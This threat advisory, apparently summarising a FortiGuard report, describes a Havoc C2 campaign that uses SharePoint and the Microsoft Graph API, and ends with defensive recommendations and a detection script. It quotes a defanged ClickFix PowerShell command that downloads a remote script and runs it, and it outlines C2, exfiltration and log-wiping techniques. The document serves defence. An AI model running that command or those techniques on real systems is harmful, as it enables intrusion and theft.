Havoc C2 Goes FUD: Sharepoint & Microsoft Graph API Abused For Stealthy Attacks


Fortinet’s FortiGuard Labs has identified a new attack campaign leveraging Havoc, an open-source post-exploitation framework, to create a fully undetectable (FUD) Command and Control (C2) system using Microsoft SharePoint and the Microsoft Graph API. The threat actor uses SharePoint as a hosting platform for payloads, while the Graph API helps obscure malicious C2 communications within legitimate Microsoft services.

Severity Level: High

Threat Overview

1. Initial Access – Phishing Email

Delivery Method:

  • Attack begins with a phishing email containing an HTML attachment named Documents.html.
  • Uses ClickFix social engineering tactics to trick users into executing a malicious PowerShell command.

Execution Trigger:

  • Victim opens the HTML file, which displays a fake error message instructing them to copy & paste a PowerShell command.
  • Example of the PowerShell payload (defanged): powershell -w h -c "iwr hxxps://hao771[.]sharepoint.com/…|iex"
  • This command downloads & executes a remote PowerShell script hosted on SharePoint.

2. Execution – PowerShell Loader

  • PowerShell execution steps:
    – Decodes the Base64 payload embedded in the HTML file.
    – Downloads an additional PowerShell script from SharePoint.
    – Runs in hidden mode to avoid detection.
    – Deletes registry entries under HKCU:\Software\Microsoft as an infection marker.

3. Secondary Payload – Python Shellcode Loader

Python-based execution steps:

  • Checks for Python installation (pythonw.exe); if not found, it downloads it.
  • Executes a Python script (payload_20250107_015913.py) in hidden mode.
  • The script acts as a shellcode loader, executing malicious payloads in memory.

Russian Debugging Strings Found:

  • Выделение памяти (Memory allocation), Запись в память (Write to memory), and Выполнение shellcode (Execution of shellcode). This suggests potential links to Russian-speaking threat actors.

4. C2 Communication – Microsoft Graph API

  • The modified Havoc Demon DLL is executed, using Microsoft Graph API to communicate with SharePoint-based C2 servers.
  • Hardcoded credentials are used to generate OAuth 2.0 tokens for API authentication.
  • The malware creates two files in SharePoint for C2 data exchange:
    – {VictimID}pD9-tKout → C2 Commands (Sent from attacker)
    – {VictimID}pD9-tKin → Response from infected system
  • Once C2 is established, the supported commands include gathering information about the target, file operations, command and payload execution, token manipulation, and Kerberos attacks.
  • Stealth Factor: Since all traffic is encrypted and disguised as legitimate Microsoft Graph API activity, it bypasses many security tools.

5. Data Exfiltration:

  • Stolen credentials, system logs, and sensitive files are uploaded to SharePoint C2 servers using Microsoft Graph API PUT requests.

Covering Tracks:

  • The malware deletes logs & temporary files to erase forensic evidence.
  • C2 files {VictimID}pD9-tKout and {VictimID}pD9-tKin are removed after execution.
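As an added defender-side example (not code from Fortinet or the Havoc project): a small Python detector that flags SharePoint audit records whose file names follow the {VictimID}pD9-tKout / {VictimID}pD9-tKin convention described in sections 4 and 5, and checks a PowerShell script block (as captured by Event ID 4104) for the ClickFix download cradle from section 1. The audit record field names and all sample records are constructed assumptions, not real telemetry.

```python
import json
import re

# Constructed sample of SharePoint / Graph API audit records (JSON lines).
# Field names are assumed for illustration; this is not real campaign telemetry.
SAMPLE_AUDIT_LOG = """
{"op": "FileUploaded", "method": "PUT", "file": "Q3-budget.xlsx", "user": "alice@example.com", "app": "Excel"}
{"op": "FileUploaded", "method": "PUT", "file": "A1B2C3pD9-tKin", "user": "svc-graph@example.com", "app": "custom-app"}
{"op": "FileAccessed", "method": "GET", "file": "A1B2C3pD9-tKout", "user": "svc-graph@example.com", "app": "custom-app"}
{"op": "FileDeleted", "method": "DELETE", "file": "A1B2C3pD9-tKout", "user": "svc-graph@example.com", "app": "custom-app"}
{"op": "FileUploaded", "method": "PUT", "file": "notes.txt", "user": "bob@example.com", "app": "OneDrive"}
"""

# {VictimID}pD9-tKout / {VictimID}pD9-tKin: the C2 file naming pattern reported for this campaign.
C2_FILE_RE = re.compile(r"^(?P<victim>[A-Za-z0-9]+)pD9-tK(?P<direction>out|in)$")

# ClickFix-style cradle: hidden window, Invoke-WebRequest to sharepoint.com piped into iex.
CLICKFIX_RE = re.compile(
    r"-w(?:indowstyle)?\s+h(?:idden)?\b.*?(?:iwr|invoke-webrequest)\s+\S*sharepoint\.com\S*\s*\|\s*iex",
    re.IGNORECASE,
)


def detect_c2_files(audit_jsonl):
    """Return one alert per audit record whose file name matches the C2 naming pattern."""
    alerts = []
    for line in audit_jsonl.strip().splitlines():
        rec = json.loads(line)
        m = C2_FILE_RE.match(rec.get("file", ""))
        if m:
            alerts.append({
                "victim_id": m.group("victim"),
                # "out" files carry attacker commands, "in" files carry the victim's responses
                "direction": "attacker->victim" if m.group("direction") == "out" else "victim->attacker",
                "op": rec["op"], "method": rec["method"], "user": rec["user"],
            })
    return alerts


def is_clickfix_cradle(script_block):
    """True if a PowerShell script block (e.g. from Event ID 4104) looks like the ClickFix cradle."""
    return CLICKFIX_RE.search(script_block) is not None
```

Because the C2 files are deleted after use, alerting on the upload (PUT) and deletion events for matching names is what surfaces the channel; the file contents themselves may no longer exist when an analyst looks.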

Recommendations

  1. Implement email filtering for suspicious HTML attachments.
  2. Disable or restrict PowerShell execution for non-administrative users.
  3. Use PowerShell Constrained Language Mode and Script Block Logging (Log ID 4104).
  4. Monitor Python script execution (python.exe, pythonw.exe) in sensitive environments.
  5. Restrict Microsoft Graph API access where not needed.
  6. Restrict API access to approved applications only.
  7. Use role-based access control (RBAC) to limit SharePoint and Graph API permissions.
  8. Keep Windows & Microsoft 365 Updated.
  9. Enforce OAuth 2.0 and disable outdated authentication methods (e.g., Basic Auth, NTLM).
  10. User Awareness: Train employees on phishing email detection and social engineering tactics. Warn against copying and pasting PowerShell commands from emails.
  11. Block the IOCs at their respective controls.
    https://www.virustotal.com/gui/collection/9a99d459b54bbbd9a6dc5ebb130c7159ce017929164a797ceee650dbcb52061d/iocs

Source:

  • https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2
